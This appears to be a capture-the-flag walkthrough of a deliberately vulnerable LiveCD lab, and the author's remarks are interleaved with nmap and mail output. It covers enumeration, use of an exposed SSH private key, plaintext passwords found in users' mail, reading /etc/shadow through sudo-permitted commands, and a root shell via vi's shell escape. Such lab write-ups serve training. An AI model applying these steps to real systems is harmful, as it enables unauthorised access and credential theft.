Scenario
"The scenario for this LiveCD is that you have been given an assignment to test a company's 192.168.2.xxx network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency previous (or current) staff2"
Scanning
PORT STATE SERVICE VERSIONI tried log in as anonymous to FTP service, but without success. I have got indeed response 230 but I can't list directory. Probably we need to user with higher privileges.
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey:
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: IDLE IMAP4REV1 BINARY THREAD=REFERENCES SORT completed SCAN CAPABILITY OK MULTIAPPEND THREAD=ORDEREDSUBJECT STARTTLS MAILBOX-REFERRALS AUTH=LOGINA0001 LITERAL+ SASL-IR UNSELECT NAMESPACE LOGIN-REFERRALS
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
443/tcp closed https
Default web page looks as below
Nice web page. So, we can see three links but in spite of that let's run dirbuster.
In the meantime I clicked on link CLICK HERE and I have got something interesting!
Great! There is a list of usernames, I think.
Dirbuster gave us result
OK, there is not much files. I have created list of usernames and I was trying brute-force FTP and SSH, but without success. I have no idea how to attack this machine. So, maybe we need to a little bit more enumeration.
Nmap scan report for 192.168.2.100So, 192.168.2.100 is our target, 192.168.2.1 is our attacker machine, but what is 192.168.2.101?
Host is up (0.00016s latency).
MAC Address: 08:00:27:53:0C:11 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.101
Host is up (0.00016s latency).
MAC Address: 08:00:27:53:0C:11 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.1
PORT STATE SERVICE VERSIONWow, what is that?
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
I run Dirbuster and /home/root directory has been found! So maybe there is other user's home directory? BINGO! We found private and public key for SSH.
Interesting... So, I have downloaded private key and I used it to log in as pirrip.
I have found something interesting in the /var/mail directory.
pirrip@slax:/var/mail$ lsSo, let's check what kind of information these mails have. Our user has very juicy information.
havisham magwitch pirrip
From: Estella Havisham <havisham@slax.example.net>Let's try log in as havisham using this password. Hmmm it does not work... but wait a minute
Message-Id: <200801132350.m0DNoXfV010468@slax.example.net>
Date: Sun, 13 Jan 2008 23:50:33 +0000
To: pirrip@slax.example.net
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Thanks! Glad to be here.
From magwitch@slax.example.net Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
Received: from slax.example.net (localhost [127.0.0.1])
by slax.example.net (8.13.7/8.13.7) with ESMTP id m0DNmvpV009983
for <pirrip@slax.example.net>; Sun, 13 Jan 2008 23:48:57 GMT
Received: (from magwitch@localhost)
by slax.example.net (8.13.7/8.13.7/Submit) id m0DNmvpd009982
for pirrip; Sun, 13 Jan 2008 23:48:57 GMT
From: Abel Magwitch <magwitch@slax.example.net>
Message-Id: <200801132348.m0DNmvpd009982@slax.example.net>
Date: Sun, 13 Jan 2008 23:48:57 +0000
To: pirrip@slax.example.net
Subject: havisham
User-Agent: nail 11.25 7/29/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
I set her up with an accountus servers. I set her password to "changeme" and will swing by tomorrow and make sure she changes her pw.
From: noreply@fermion.herot.netWow, now we know our password! So let's check what we can do as root.
Message-Id: <200801132354.m0DNshjD011722@slax.example.net>
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Fermion Account Login Reminder
Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems.
Regards,
Fermion Support
E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st
pirrip@slax:/var/mail$ sudo -lExcellent! I have used more command toward /etc/shadow
User pirrip may run the following commands on this host:
(root) /usr/bin/more
(root) /usr/bin/tail
(root) /usr/bin/vi
(root) /usr/bin/cat ALL
So, we are able to use John the Ripper. Unfortunately it consumes a lot of time... We know that vi can use another command via !command.
Game over!
